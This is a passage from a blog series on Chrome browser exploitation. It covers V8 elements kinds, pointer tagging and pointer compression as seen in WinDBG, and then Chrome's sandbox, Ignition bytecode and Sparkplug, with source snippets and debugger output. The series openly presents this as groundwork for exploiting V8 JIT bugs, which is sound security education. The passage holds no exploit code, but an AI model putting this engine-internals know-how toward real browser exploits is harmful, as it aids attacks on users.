As you can see, the holey_array has β€œholes” in it, since we forgot to add the 3 to the index and just left it blank or undefined. The reason that V8 makes this distinction is because operations on packed arrays can be optimized more aggressively than operations on holey arrays. If you want to learn more about that, then I suggest you watch Mathias Bynens’s talk β€œV8 internals for JavaScript Developers” which details this very well.

V8 also implements the previously mentioned elements kind transitions on both PACKED and HOLEY arrays, which forms a β€œlattice”. A simple visualization of those transitions from the V8 blog can be seen below.

Again, we must remember that elements kinds have one-way downward transitions through this lattice. Such as adding a floating-point to an SMI array will mark it double, and similarly, once a hole is created in an array, it’s marked as holey forever, even when you fill it later.

V8 also has a second major distinction made on elements that we need to understand. In the element backing stores, just like in the properties store, elements can also be either fast or in dictionary-mode (slow). Fast elements are simply an array where the property index maps to the offset of the item in the elements store. As for slow array’s, this happens when there are large sparse arrays where only a few entries are occupied. In this case, the array backing store uses a dictionary representation such as we’ve seen in the properties store to save memory at the cost of performance. That dictionary will store the key, value, and element attributes within the dictionary triplet values.

Viewing Chrome Objects In-Memory

At this point we covered a lot of complex topics on both JavaScript and V8 internals. Hopefully at this point you have a somewhat decent understanding of some of the concepts that make V8 work under the hood. Now that we have that knowledge, it’s time we jump into observing how V8 and its objects look like in memory when observed via WinDBG and what type of optimizations are in use.

The reason we are using WinDBG is because when we will be writing exploits, debugging our POC, etc. we will mostly be using WinDBG in combination with d8. In that case, it’s good for us to be able to grasp and understand the nuances of V8’s memory structure. In case you’re not familiar with WinDBG, then I suggest you read and get familiar with the β€œGetting Started with WinDbg (User-Mode)” blog post from Microsoft and read β€œGDB commands for WinDbg Users” if you used GDB before.

I know that we already looked into memory structures of objects and maps, and have messed around with d8 - so we should have a general idea of what points to what and where things are in memory. But, don’t be fooled that it will be so easy. As with everything in V8, optimizations play a big part in allowing it to be fast and efficient, this also is true to how it handles and stores values in memory.

What do I mean by that? Well let’s take a quick look into a simple V8 object structure using d8 and WinDBG. To start, let’s initiate d8 again with the --allow-natives-syntax option, and create a simple object, such as:

d8> var obj = {x:1, y:2}

Once done, let’s go ahead and use the %DebugPrint() function to print out the objects information.

d8> var obj = {x:1, y:2};
d8> %DebugPrint(obj)
DebugPrint: 000002530010A509: [JS_OBJECT_TYPE]
 - map: 0x025300259735 <Map[20](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x025300244669 <Object map = 0000025300243D25>
 - elements: 0x025300002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x025300002259 <FixedArray[0]>
 - All own properties (excluding elements): {
    00000253000041ED: [String] in ReadOnlySpace: #x: 1 (const data field 0), location: in-object
    00000253000041FD: [String] in ReadOnlySpace: #y: 2 (const data field 1), location: in-object
 }
0000025300259735: [Map] in OldSpace
 - type: JS_OBJECT_TYPE
 - instance size: 20
 - inobject properties: 2
 - elements kind: HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0x0253002596ed <Map[20](HOLEY_ELEMENTS)>
 - prototype_validity cell: 0x0253002043cd <Cell value= 1>
 - instance descriptors (own) #2: 0x02530010a539 <DescriptorArray[2]>
 - prototype: 0x025300244669 <Object map = 0000025300243D25>
 - constructor: 0x02530024422d <JSFunction Object (sfi = 000002530021BA25)>
 - dependent code: 0x0253000021e1 <Other heap object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

Afterwards, launch WinDBG and attach it to the d8 process. Once the debugger is hooked in, we’ll execute the dq command followed by our object’s memory address (0x0000020C0010A509) to display its memory contents. Your output should be pretty similar to mines.

Looking into the WinDBG output, we can see that we are using the correct memory address for the object. But, when we look into the memory contents, the first address (which should be a pointer to the map - if you recall our JSObject structure) seems to be corrupted. Well, one would think it’s corrupted, the more experienced reverse engineers or exploit dev’s would maybe even think that there is an offset/alignment issue, and you would technically be close, but not correct.

This again my friends are V8’s optimizations at work. You can see why we need to discuss these optimizations, because to an untrained eye you would get seriously lost and confused as to what is going on in memory. What we’re actually seeing here are two things - Pointer Compression and Pointer Tagging.

We’ll start by first understanding Pointer or Value tagging in V8.

Pointer Tagging

So, what is pointer tagging and why do we use it? Well as we know it, in V8, values are represented as objects and allocated on the heap - no matter if they are an object, array, number, or string. Now, many JavaScript programs actually perform calculations on integer values, so if we constantly had to create a new Number() object in JavaScript each time we increment or modify a value then this results in an overhead of time for creating the object, heap tracking, and it increases the memory space used, making this very inefficient.

In that case, what V8 will do, is that instead of creating a new object each time, it will actually store some of the values inline. While this works, it creates a second problem for us. And that problem is, how do we differentiate an object pointer from a inline value? Well, this is where pointer tagging comes into play.

Pointer tagging’s technique is based on the observation that on x32 and x64 systems, allocated data must be at word-aligned (4 byte) boundaries. Because data is aligned this way, the least significant bits (LSB) will always be zero. Tagging will then use the two bottom bits or least significant bits to differentiate between a heap object pointer and an integer or SMI.

On an x64 architecture, the following tagging scheme is used:

            |----- 32 bits -----|----- 32 bits -------|
Pointer:    |________________address______________(w1)|
Smi:        |____int32_value____|000000000000000000(0)|

As you can see from the example, a 0 is used to represent a SMI, and a 1 is used to represent a pointer. Just one thing to note, is you are looking at SMI’s in memory, while they are stored inline, they are actually doubled to avoid a pointer tag. So, if you original value is 1, it will be 2 in the memory.

Within the pointer we also have a w in the second LSB which denotes a bit that is used to distinguish between a strong or weak pointer reference. If you’re not familiar with what a strong vs weak pointer is, I’ll explain. Simply a strong pointer is a pointer that indicates that the object pointed to must remain in memory (it represents an object), while a weak pointer is a pointer that simply points to data that might have been deleted. When the GC or garbage collector deletes an object, it has to delete the strong pointer as it’s the one that holds a reference count.

With this pointer tagging scheme, arithmetic or binary operations on integers can ignore the tag as the lower 32 bits will be all zeroes. However, when it comes to dereferencing a HeapObject then V8 needs to mask off the least significant bit first, which a special accessor is used for to that take care of clearing the LSB.

Knowing that now, let’s go back to our example in WinDBG and clear that LSB by subtracting 1 from the address. That should then provide us with valid memory addresses. Once done, your output should look like so.

As you can see, once we clear the LSB, we now have valid pointer addresses in memory! In particular we have the map, properties, elements, and then our inline objects. Again, note that SMI’s are doubled so x which holds 1 is actually 2 in memory, and same holds true for 2, as it is now 4.

To those with a keen eye, you might have noticed that only half of the pointer actually points to the object in memory. Why is that? If your answer was β€œanother optimization” then you would be right. This is something called Pointer Compression, which we will now talk about.

Pointer Compression

Pointer Compression in Chrome and V8 makes use of an interesting property of objects on the heap, and that’s that heap objects are usually close to one another, so the most significant bits of the pointer will probably be the same. In that case, V8 only saves half of the pointer (the least significant bits) to memory and puts the most significant bits (upper 32 bits) of V8’s heap (known as the isolate root) into a root register (R13). Whenever we need to access a pointer, the register and the value in memory are just added together and we get our full address. The compression scheme is implemented within the /src/common/ptr-compr-inl.h source file in V8.

Basically, the goal that the V8 team was trying to accomplish was to somehow fit both kinds of tagged values into 32 bits on 64-bit architectures, specifically to reduce overhead in V8 to try and get back as many wasted 4 bytes as possible within the x64 architecture.

Closing

And that about does it for our deep dive into JavaScript and V8 internals! I hope you enjoyed this post and I sincerely hope it helped some of you learn the complexities of V8.

I know this was a lot to cover, and honestly, it’s very complex at first - so take your time to read through this and make sure you understand the basic concepts, because you’ll need to understand how all of this works under the hood before we can exploit it. Remember, to know how to break something, we first need to know how it works.

In part two of this blog post series, we’ll go back into further understanding the compiler pipeline, and explain what happens under the hood in Ignition, Spark-Plug, and TurboFan. We’ll also be focusing more on the JIT compiler, speculative guards, optimizations, assumptions and more which will then allow us to better understand common JavaScript engine vulnerabilities such as type confusions.

Kudos

I would like to sincerely thank maxpl0it and Fletcher for proofreading this blog post, providing critical feedback and adding in a few important details before it’s release. You guys are awesome for taking the time to review this post for accuracy and readability. Thank you!

References

Chrome Browser Exploitation, Part 2: Introduction to Ignition, Sparkplug and JIT Compilation via TurboFan

16 November 2022 at 00:00

In my previous post β€œChrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals”, we took our first deep dive into the world of browser exploitation by covering a few complex topics that were necessary for fundamental knowledge. We mainly covered topics on how JavaScript and V8 worked under the hood by exploring what objects, maps and shapes were, how these objects were structured in memory, and we also covered some basic memory optimizations such as pointer tagging and pointer compression. We also touched on the compiler pipeline, bytecode interpreter, and code optimizations.

Now, if you haven’t read my previous post yet - then I highly recommend that you do so. Otherwise, you might be lost and totally unfamiliar with some of the topics presented within this post, since we are pretty much building off of the knowledge presented in Part 1 and further expanding on it.

In today’s blog post, we’ll go back to the compiler pipeline and will further expand on some of the concepts that we talked about, such as V8’s bytecode, code compilation, and code optimization. Overall, in this post we will be taking a deep dive into understanding what happens under the hood in Ignition, Sparkplug, and TurboFan as they are critical for our understanding in how certain β€œfeatures” can lead to exploitable bugs.

The following topics will be discussed:

  • Chrome Security Model
    • Multi-Process Sandbox Architecture
    • V8’s Isolate and Context
  • Ignition Interpreter
    • Understanding V8’s Bytecode
    • Understanding the Register-Based Machine
  • Sparkplug
    • 1:1 Mapping
  • TurboFan
    • Just-In-Time Compilation (JIT)
    • Speculative Optimization and Type Guards
    • Feedback Lattice
    • β€œSea of Nodes” Intermediate Representation (IR)
  • Common Optimizations
    • Typer
    • Range Analysis
    • Bounds Checking Elimination (BCE)
    • Redundancy Elimination
    • Other Optimizations
      • Control Optimization
      • Alias Analysis & Global Value Numbering
      • Dead Code Elimination (DCE)
  • Common JIT Compiler Vulnerabilities

Alright, with that long and scary list of complex topics out of the way, let’s take a deep breath and dive right in!

Note: Most, if not all of the highlighted code paths are clickable links. Use these links to be taken to the relevant part of the Chromium source code so that you can examine the code more closely and follow along with the post.

Also, take the time to read through the code comments. The Chromium source code, while complex, has some pretty good comments that can help you in understanding what part of the code is and what it does.

Chrome Security Model

Before we dive into understanding the complexities of the compiler pipeline, how it does optimizations, and where bugs can appear, we first need to take a step back and look at the bigger picture. While the compiler pipeline plays a big role in JavaScript execution, it’s only one piece of the puzzle within the whole architecture of browsers.

As we’ve seen, V8 can run as a standalone application, but when it comes to the browser as a whole, V8 is actually embedded into Chrome and then utilized via bindings by another engine. Because of this, there are nuances and certain implications that we need to be aware of on how JavaScript code within an application is processed because that information is critical to our understanding of security issues within a browser.

For us to see this β€œbigger picture”, and to put together all the pieces of the puzzle, we need to start off by understanding the Chrome Security Model. This blog post series is a journey through browser internals and exploitation after all. So, to better understand why certain bugs are more trivial than others, and why exploitation of just one bug might not lead to direct remote code execution, we need to understand the architecture of Chromium.

As we know, JavaScript engines are an integral part to the execution of JavaScript code on systems. While they play a big role in making browsers fast and efficient, they also can open up a browser to crashes, application hang-ups, and even security risks. But JavaScript engines aren’t the only part of a browser that can have issues or vulnerabilities. Many other components such as the API’s or HTML and CSS render engines being used can also have stability issues and vulnerabilities that could potentially be exploited - albeit intentionally or not.

Now, it’s almost rather impossible to build a JavaScript or rendering engine that will never crash. And it’s also nearly impossible to build these types of engines to be safe and secure from bugs and vulnerabilities - especially because most of these components are programmed in the statically-typed language of C++ which needs to handle the dynamic nature of web applications.

So how does Chrome handle such an β€œimpossible” task of trying to keep the browser running efficiently while also trying to keep the browser, system, and its users secure? In two ways, by using a multi-process architecture and sandboxing.

Multi-Process Sandbox Architecture

Chromium’s multi-process architecture is just that, an architecture that uses multiple processes to protect the browser from instability issues and bugs that can stem from the JavaScript engine, render engine, or other components. Chromium also restricts access between each of these processes by only allowing certain processes to talk to one another. This type of architecture can be viewed as the incorporation of memory protection and access controls within an application.

In general, browsers have one main process that runs the UI and manages all the other processes - this is known as the β€œbrowser process” or β€œbrowser” for short. Very unique, I know. The processes that handle the web content are known as the β€œrenderer processes” or β€œrenderers”. These render processes utilize something called Blink which is the open-source rendering engine used by Chrome. Blink implements many other libraries that help it run, such as Skia, which is an open-source 2D graphics library, and of course V8 for JavaScript.

Now, here are where things get a little bit complicated. In Chrome, each new window or tab opens up in a new process - which usually will be a new render process. This new render process has a global RenderProcess object that manages communication with the parent browser process and maintains global state of the web page or application within that window or tab. In turn, the main browser process will maintain a corresponding RenderProcessHost object for each renderer, which manages browser state and communication for the renderer.

To communicate between each of these processes, Chromium uses either a legacy IPC system or Mojo. I’m not going to get into too much detail into how these work, because honestly the architecture and communication scheme of Chrome in and of itself can be a separate blog post. I will leave it up to the reader to follow the links and do your own research.

Overall, talk is cheap, and computational power is expensive. To help with better visualizing what we just explained, the image below from the Chromium development team will provide us with a high-level overview of what that multi-process architecture looks like.

In addition to each of these renderers being in its own process, Chrome also takes the opportunity to restrict the processes access to system resources via sandboxing. By sandboxing each process, Chrome can ensure that a renderers only access to network resources will be via the network service dispatcher running within the main process. Additionally, it can also restrict the processes access to the filesystem as well as access to the user’s display, cookies, and input.

In general, this limits what an attacker can do if they obtain remote code execution within a renderer process. Essentially, they won’t be able to make persistent changes to the computer or access information such as user input and cookies in other windows and tabs without exploiting or chaining another bug to break out of that sandbox.

I won’t go into any more detail from here as this will take away from the current topic of the blog post. But I highly suggest that you read the β€œChromium Windows Sandbox Architecture” documentation in depth to not only understand the design principles, but to better understand the broker and target process communication scheme.

So how does this look like in practice? Well we can see a practical example of this by starting up Chrome, opening two tabs and launching Process Monitor. Initially we should see that Chrome has one parent or β€œbrowser” process and a few child processes, like so.

Now if we were to look into the main parent process, and compare it to a child process, we will notice that the other processes are running with different command line parameters. In the case of this example, we see that the child process (on the right) is that of the renderer type, and matches its parent browser process (on the left). Cool, right?

Alright, after covering all of this, I know that you might be asking me what does all of this have to do with V8 and JavaScript? Well, if you were paying attention, then you would have noticed a key point when I brought up Chromes renderer engine, Blink. And that’s the fact that it implements V8.

If you took the time to read up on some of the Blink documentation as a good student should, then you would have learned a little about Blink. Within the documentation it states that Blink runs in each renderer process and it has one main thread which handles JavaScript, DOM, CSS, style and layout calculations. Additionally, Blink can also create multiple β€œworker” threads to run additional scripts, extensions, etc.

In general, each Blink thread runs its own instance of V8. Why? Well as you know, within a separate browser window or tab there can be a lot of JavaScript code running, not just for the page, but in different iframes for stuff like ads, buttons, etc. At the end of the day each of those scripts and iframes have separate JavaScript contexts and there has to be a way of preventing one script from manipulating objects in another.

To help β€œisolate” one scripts context from another, V8 implements something known as an Isolate and Context, which we will now talk about.

V8’s Isolate and Context

In V8, an Isolate is simply a concept of an instance or β€œvirtual machine” which represents one JavaScript execution environment; including a heap manager, a garbage collector, etc. In Blink, isolates and threads have a 1:1 relationship, where one isolate is associated with the main thread and one isolate is associated with one worker thread.

Now, the Context corresponds to a global root object which holds the state of the VM and is used to compile and execute scripts in a single instance of V8. Roughly speaking, one window object corresponds to one context, and since each frame has a window object, there are potentially multiple contexts in a renderer process. In relation to the isolate, the isolate and contexts have a 1:N relationship over the lifetime of the isolate - where that specific isolate or instance will interpret and compile multiple contexts.

This means that each time JavaScript need to be executed, we need to validate that we are in the correct context via GetCurrentContext() or we’ll end up either leaking JavaScript objects or overwriting them, which potentially can cause a security issue.

In Chrome, the runtime object v8::Isolate is implemented in v8/include/v8-isolate.h and the v8::Context object is implement in v8/include/v8-context.h. Using what we know, from a high-level, we can visualize the runtime and context inherence in Chrome to look like so:

If you would like to learn more about how these Isolates and Context work in depth, then I suggest reading β€œDesign of V8 Bindings” and β€œGetting Started with Embedding V8”.

Ignition Interpreter

Now that we have a general overview of Chromium’s architecture, and understand that all JavaScript code isn’t executed in the same V8 engine instance, we can finally go back into the compiler pipeline and continue our deep dive.

We’ll start off by understanding V8’s interpreter, Ignition, in more depth.

As a recap from Part 1, let’s take a look back at our high-level overview of the V8 compilation pipeline just so we know where we are within this pipeline.

We already covered Tokens and Abstract Syntax Trees (AST) in Part 1, and we briefly explained how an AST is parsed and then translated into bytecode within the Interpreter. What I want to do now is cover V8’s bytecode, since the bytecode produced by the interpreter is a critical building block that makes up any JavaScript functionality. Additionally, when Ignition compiles bytecode, it also collects profiling and feedback data each time a JavaScript function is run. This feedback data is then used by TurboFan to generate JIT optimized machine code.

But, before we can begin to understand how the bytecode is structured, we need to first understand how Ignition implements it’s β€œregister machine”. Reason being is that each bytecode specifies its inputs and outputs as register operands, so we sort of need to know where these inputs and outputs will go on the stack. This will also help us with further visualizing and understanding the stack frames that are produced in V8.

Understanding the Register-Based Machine

As we know, the Ignition interpreter is a register-based interpreter with an accumulator register. These β€œregisters” aren’t actually traditional machine registers as one would think. Instead, they are specific slots in a register file which is allocated as part of a function’s stack frame - in essence they are β€œvirtual” registers. As we’ll see later, bytecodes can specify these input and output registers on which their arguments will operate on.

Ignition consists of a set of bytecode handlers which are written in a high-level, machine agnostic assembly code. These handlers are implemented by the CodeStubAssembler class and compiled by using TurboFan’s backend when the browser is compiled. Overall, each of these handlers β€œhandles” a specific bytecode and then dispatches to the next bytecode’s respective handler.

An example of the LdaZero or β€œLoad Zero to Accumulator” bytecode handler from v8/src/interpreter/interpreter-generator.cc can be seen below.

// LdaZero
// Load literal '0' into the accumulator.
IGNITION_HANDLER(LdaZero, InterpreterAssembler) 
{
  TNode<Number> zero_value = NumberConstant(0.0);
  SetAccumulator(zero_value);
  Dispatch();
}

When V8 creates a new isolate, it will load the handlers from a snapshot file that was created during build time. The isolate will also contain a global interpreter dispatch table which holds a code object pointer to each bytecode handler, as indexed by the bytecode value. Generally, this dispatch table is simply just an enum.

In order for the bytecode to be run by Ignition, the JavaScript function is first translated to bytecode from its AST by a BytecodeGenerator. This generator walks the AST and emits the appropriate bytecode per each AST node by calling the GenerateBytecode function.

This bytecode is then associated with the function (which is a JSFunction object) in a property field known as the SharedFunctionInfo object. Afterwards, the JavaScript functions code_entry_point is set to the InterpreterEntryTrampoline built-in stub.

The InterpreterEntryTrampoline stub is entered when a JavaScript function is called, and is responsible for setting up the appropriate interpreter stack frame while also dispatching to the interpreter’s bytecode handler for the first bytecode of the function. This then starts the execution or β€œinterpretation” of the function by Ignition which is handled within the v8/src/builtins/x64/builtins-x64.cc source file.

Specifically, on Lines 1255 - 1387 within builtins-x64.cc the Builtins::Generate_InterpreterPushArgsThenCallImpl and Builtins::Generate_InterpreterPushArgsThenConstructImpl functions are responsible for further building out the interpreter stack frame by pushing the arguments and function state to the stack.

I won’t get too much more into the bytecode generator, but if you want to expand your knowledge, then I suggest reading the β€œIgnition Design Documentation: Bytecode Generation” section to get a better understanding of how it works under the hood. What I want to focus on in this section is the register allocation and stack frame creation for a function.

So how does this stack frame get generated?

Well, during bytecode generation, the BytecodeGenerator will also allocate registers in a function’s register file for local variables, context object pointers, and temporary values that are required for expression evaluation.

The InterpreterEntryTrampoline stub handles the initial building of the stack frame, and then allocates space in the stack frame for the register file. This stub will also write undefined to all the registers in this register file so that the Garbage Collector (GC) doesn’t see any invalid (i.e., non-tagged) pointers when it walks the stack.

Bytecode will operate on these registers by specifying it in its operands, and Ignition will then load or store data from the specific stack slot that is associated with the register. Since register indexes map directly to the function stack frame slots, Ignition can directly access other slots on the stack, such as the context and the arguments that were passed in with the function.

An example of how a stack frame for a function looks like (as provided by the Chromium team), can be seen below. Take note of the β€œInterpreter Stack Frame”. This is the stack frame that is built by the InterpreterEntryTrampoline.

As you can see, we have the functions arguments in red, and it’s local variables and temporary variables for expression evaluation in green.

The light green portion contains the Isolates current context object, the caller pointer counter, and a pointer to the JSFunction object. This pointer to JSFunction is also knowns as the closure which links to the functions context, SharedFunctionInfo object, as well as to other accessors like the FeedbackVector. An example of how this JSFunction looks like in memory can be seen below.

You might also notice that there is no accumulator register in the stack frame. And the reason for that is because the accumulator register will change constantly during function calls, in that case it’s kept within the Interpreter as a state register. This state register is pointed to by the Frame Pointer (FP), which also holds the stack pointer and frame counter.

Going back to the first stack frame example, you will also notice that there is a Bytecode Array pointer. This BytecodeArray represents a sequence of interpreter bytecodes for that specific function within the stack frame. Initially each bytecode is an enum where the index of the bytecode stores the corresponding handler - as explained previously.

An example of this BytecodeArray can be seen in v8/src/objects/code.h and a snippet of that code is provided below.

// BytecodeArray represents a sequence of interpreter bytecodes.
class BytecodeArray
    : public TorqueGeneratedBytecodeArray<BytecodeArray, FixedArrayBase> {
 public:
  static constexpr int SizeFor(int length) {
    return OBJECT_POINTER_ALIGN(kHeaderSize + length);
  }

  inline byte get(int index) const;
  inline void set(int index, byte value);

  inline Address GetFirstBytecodeAddress();

  inline int32_t frame_size() const;
  inline void set_frame_size(int32_t frame_size);

As you can see, the GetFirstBytecodeAddress() function is responsible for getting the first bytecode address in the array. So how does it find that address?

Well let’s take a quick look at the bytecode generated for var num = 42.

d8> var num = 42;
[generated bytecode for function:  (0x03650025a599 <SharedFunctionInfo>)]
Bytecode length: 18
Parameter count 1
Register count 3
Frame size 24
Bytecode age: 0
         000003650025A61E @    0 : 13 00             LdaConstant [0]
         000003650025A620 @    2 : c4                Star1
         000003650025A621 @    3 : 19 fe f8          Mov <closure>, r2
         000003650025A624 @    6 : 66 5f 01 f9 02    CallRuntime [DeclareGlobals], r1-r2
         000003650025A629 @   11 : 0d 2a             LdaSmi [42]
         000003650025A62B @   13 : 23 01 00          StaGlobal [1], [0]
         000003650025A62E @   16 : 0e                LdaUndefined
         000003650025A62F @   17 : aa                Return

Don’t worry about what each of these bytecodes mean, we’ll explain that in a little. Take a look at the 1st line in the bytecode array, it stores LdaConstant. To the left of it we see 13 00. The hex number 0x13 is the bytecode enumerator, which represents where the handler for that bytecode will be.

Once that’s received, the SetBytecodeHandler() will be called with the bytecode, operands, and it’s handlers enum. This function is within the v8/src/interpreter/interpreter.cc file; an example of that function is shown below.

void Interpreter::SetBytecodeHandler(Bytecode bytecode,
                                     OperandScale operand_scale,
                                     CodeT handler) {
  DCHECK(handler.is_off_heap_trampoline());
  DCHECK(handler.kind() == CodeKind::BYTECODE_HANDLER);
  size_t index = GetDispatchTableIndex(bytecode, operand_scale);
  dispatch_table_[index] = handler.InstructionStart();
}

size_t Interpreter::GetDispatchTableIndex(Bytecode bytecode,
                                          OperandScale operand_scale) {
  static const size_t kEntriesPerOperandScale = 1u << kBitsPerByte;
  size_t index = static_cast<size_t>(bytecode);
  return index + BytecodeOperands::OperandScaleAsIndex(operand_scale) *
                     kEntriesPerOperandScale;
}

As you can see, dispatch_table_[index] will calculate the index of the bytecode from the dispatch table which is stored in a physical register, and eventually this will initiate or finalize the Dispatch() function to execute the bytecode.

The bytecode array also contains something called a β€œConstant Pool Pointer” which stores heap objects that are referenced as constants in generated bytecode, such as strings and integers. The constant pool is a FixedArray of pointers to heap objects. An example of this BytecodeArray pointer and its constant pool of heap objects can be seen below.

One more thing I want to mention before we continue, is that the InterpreterEntryTrampoline stub has some fixed machine registers that are used by Ignition. These registers are located within the v8/src/codegen/x64/register-x64.h file.

A sample of these registers can be seen below, and comments are added to the ones of interest.

// Define {RegisterName} methods for the register types.
DEFINE_REGISTER_NAMES(Register, GENERAL_REGISTERS)
DEFINE_REGISTER_NAMES(XMMRegister, DOUBLE_REGISTERS)
DEFINE_REGISTER_NAMES(YMMRegister, YMM_REGISTERS)

// Give alias names to registers for calling conventions.
constexpr Register kReturnRegister0 = rax;
constexpr Register kReturnRegister1 = rdx;
constexpr Register kReturnRegister2 = r8;
constexpr Register kJSFunctionRegister = rdi;
// Points to the current context object
constexpr Register kContextRegister = rsi;
constexpr Register kAllocateSizeRegister = rdx;
// Stores the implicit accumulator interpreter register
constexpr Register kInterpreterAccumulatorRegister = rax;
// The current offset of execution in the BytecodeArray
constexpr Register kInterpreterBytecodeOffsetRegister = r9;
// Points the the start of the BytecodeArray object which is being interpreted
constexpr Register kInterpreterBytecodeArrayRegister = r12;
// Points to the interpreter’s dispatch table, used to dispatch to the next bytecode handler
constexpr Register kInterpreterDispatchTableRegister = r15;

Now that we understand this, it’s time to dig into how V8 bytecode looks like and how the bytecode operand interacts with register file.

Understanding V8’s Bytecode

As stated in Part 1, there are several hundred bytecodes within V8, and they are all defined within the v8/src/interpreter/bytecodes.h header file. As we’ll see in a minute, each of these bytecodes specifies it’s input and output operands as registers to the register file. Additionally, many of the opcodes start with Lda or Sta, in the name, where the a stands for accumulator.

For example, let’s follow the bytecode definition for LdaSmi:

V(LdaSmi, ImplicitRegisterUse::kWriteAccumulator, OperandType::kImm)

As you can see the LdaSmi will β€œLoad” (hence the Ld) a value into the accumulator register. In this case it will load a kImm operand which is a signed byte, which coincides with the Smi or Small Integer in they bytecode name. In summary, this bytecode will load a small integer into the accumulator register.

Do note, that a list of operands and their types are defined within the v8/src/interpreter/bytecode-operands.h header file.

So, with that basic information, let’s take a look at some bytecode of an actual JavaScript function. To start, let’s launch d8 with the --print-bytecode flag so we can see the bytecode. Once that’s done, just enter some random JavaScript code and press enter a few times. Reason for this is because V8 is a β€œlazy” engine, so it won’t compile stuff it doesn’t need. But because we are using strings, and numbers for the first time, it’s going to compile libraries like Stringify, which results in a massive amount of output at first.

Once done, let’s create a simple JavaScript function called incX which will increment an object’s property of x by one, and return it to us. The function should look like so.

function incX(obj) { return 1 + obj.x; }

This will generate some bytecode, but let’s not worry about it. Now that we have that, let’s call that function with an object that has a value assigned to property x, and view the bytecode generated.

d8> incX({x:13});
...
[generated bytecode for function: incX (0x026c0025ab65 <SharedFunctionInfo incX>)]
Bytecode length: 11
Parameter count 2
Register count 1
Frame size 8
Bytecode age: 0
         0000026C0025ACC6 @    0 : 0d 01             LdaSmi [1]
         0000026C0025ACC8 @    2 : c5                Star0
         0000026C0025ACC9 @    3 : 2d 03 00 01       GetNamedProperty a0, [0], [1]
         0000026C0025ACCD @    7 : 39 fa 00          Add r0, [0]
         0000026C0025ACD0 @   10 : aa                Return
Constant pool (size = 1)
0000026C0025AC99: [FixedArray] in OldSpace
 - map: 0x026c00002231 <Map(FIXED_ARRAY_TYPE)>
 - length: 1
           0: 0x026c000041ed <String[1]: #x>
Handler Table (size = 0)
Source Position Table (size = 0)
14

We’ll ignore most of the output and just focus on the bytecode section. But before we do, take note that this bytecode is in the SharedFunctionInfo object, which coincides with our explanation before! To start we see that LdaSmi is called to load a small integer into the accumulator register, which will be a value of 1.

Next, we call Star0 which will store (hence the st) the value in the accumulator (as per the a) in register r0. So in this case we move 1 to r0.

The GetNameProperty bytecode gets a named property from a0 and stores it in the accumulator, which will be the value of 13. The a0 refers to the i-th argument of the function. So if we passed in, a,b,x, and we wanted to load x, the bytecode operand would state a2 as we are the 2nd argument within the function (remember this is an array of arguments). In this case a0 will look up the named property in the table to where the index 0 maps to x.

 - length: 1
           0: 0x026c000041ed <String[1]: #x>

In short, this is the bytecode that loads obj.x. The other [0] operand is known as a feedback vector which contains runtime information and object shape data that is used for optimization by TurboFan.

Next, we Add the value in register r0 to the accumulator, resulting in the value of 14. Finally, we call Return which returns the value of the accumulator, and we exit the function.

In order to help you visualize this on the stack frame, I have provided a GIF of what happens on a simplified stack with each bytecode instruction.

As you can see, while the bytecodes are a little cryptic, once we get the hang of what each one does, it’s pretty easy to understand and follow along. If you want to learn more about V8’s bytecode, I suggest reading β€œJavaScript Bytecode – v8 Ignition Instructions” which covers a good chunk of different operations.

Sparkplug

Now that we have a decent understanding of how Ignition generates and executes your JavaScript code as bytecode, it’s time we start looking into V8’s compilation portion of the compiler pipeline. We’ll start with Sparkplug because it’s rather easy to understand as it only does a small modification to the already generated bytecode and stack for optimization purposes.

As we know from Part 1, Sparkplug is V8’s very-fast non-optimizing compiler which sits in between Ignition and TurboFan. In essence, Sparkplug isn’t really a compiler but more of a transpiler which converts Ignitions bytecode into machine code to run it natively. Also, it’s a non-optimizing compiler, so it doesn’t do very specific optimizations since TurboFan will do that.

So, what makes Sparkplug so fast? Well, Sparkplug is fast because it cheats. The functions that it compiles have already been compiled down to bytecode, and as we know it, Ignition already has done the hard work of variable resolution, control flow, etc. In this case, Sparkplug compiles from the bytecode rather than from JavaScript source.

Second of all, Sparkplug doesn’t produce any intermediate representation (IR) like most compilers do (which we’ll learn about later). In this case, Sparkplug compiles directly to machine code in a single linear pass over the bytecode. This in general is known as 1:1 mapping.

The funny thing is that Sparkplug is pretty much just a switch statement inside a for loop which dispatches to fixed bytecode and then generates the machine code. We can see this implementation within the v8/src/baseline/baseline-compiler.cc source file.

An example of Sparkplug’s machine code generation function can be seen below.

switch (iterator().current_bytecode()) {
#define BYTECODE_CASE(name, ...)       \
  case interpreter::Bytecode::k##name: \
    Visit##name();                     \
    break;
    BYTECODE_LIST(BYTECODE_CASE)
#undef BYTECODE_CASE
  }

So how does Sparkplug generate this machine code? Well, it does so by cheating again, of course. Sparkplug generates very little code of its own, instead Sparkplug just calls the bytecode builtins that are usually entered by the InterpreterEntryTrampoline and then handled within v8/src/builtins/x64/builtins-x64.cc.

If you remember back to our JSFunction object during our talk about Ignition, you’ll remember that the closure linked to β€œoptimized code”. In essence, Sparkplug will store the bytecode’s builtin there, and when the function gets executed, instead of dispatching to the bytecode, we call the builtin directly.

At this point you might be thinking that Sparkplug is essentially a glorified interpreter, and you wouldn’t be wrong. Sparkplug pretty much just serializes the interpreter’s execution by calling the same builtins. But this allows for the JavaScript function to be faster, because by doing this we can avoid the interpreter overheads like opcode decoding and bytecode dispatching lookups - allowing us to scale back CPU usage by moving from an emulation engine to native execution.

To learn a little bit more about how these builtins work, I suggest reading β€œShort Builtin Calls”.

1:1 Mapping

Sparkplug’s 1:1 mapping doesn’t just relate to how it compiles Ignition’s bytecode down to its machine code variant; it’s also related to stack frames as well. As we know, each portion of the compiler pipeline needs to store function state. And as we’ve seen already in V8, JavaScript function states are stored in Ignition’s stack frames by storing the current function being called, the context it is being called with, the number of arguments that were passed, a pointer to the bytecode array, and so on and so forth.

Now, as we know, Ignition is a register-based interpreter which has virtual registers that are used for function arguments and as inputs and outputs for bytecode operands. For Sparkplug to be fast and to avoid having to do any register allocation of its own, it reuses Ignitions register frames which in turn allows Sparkplug to mirror the interpreter’s behavior and stack as well. This allows Sparkplug to not need any sort of mapping between the two frames - making these stack frames almost 1:1 compatible.

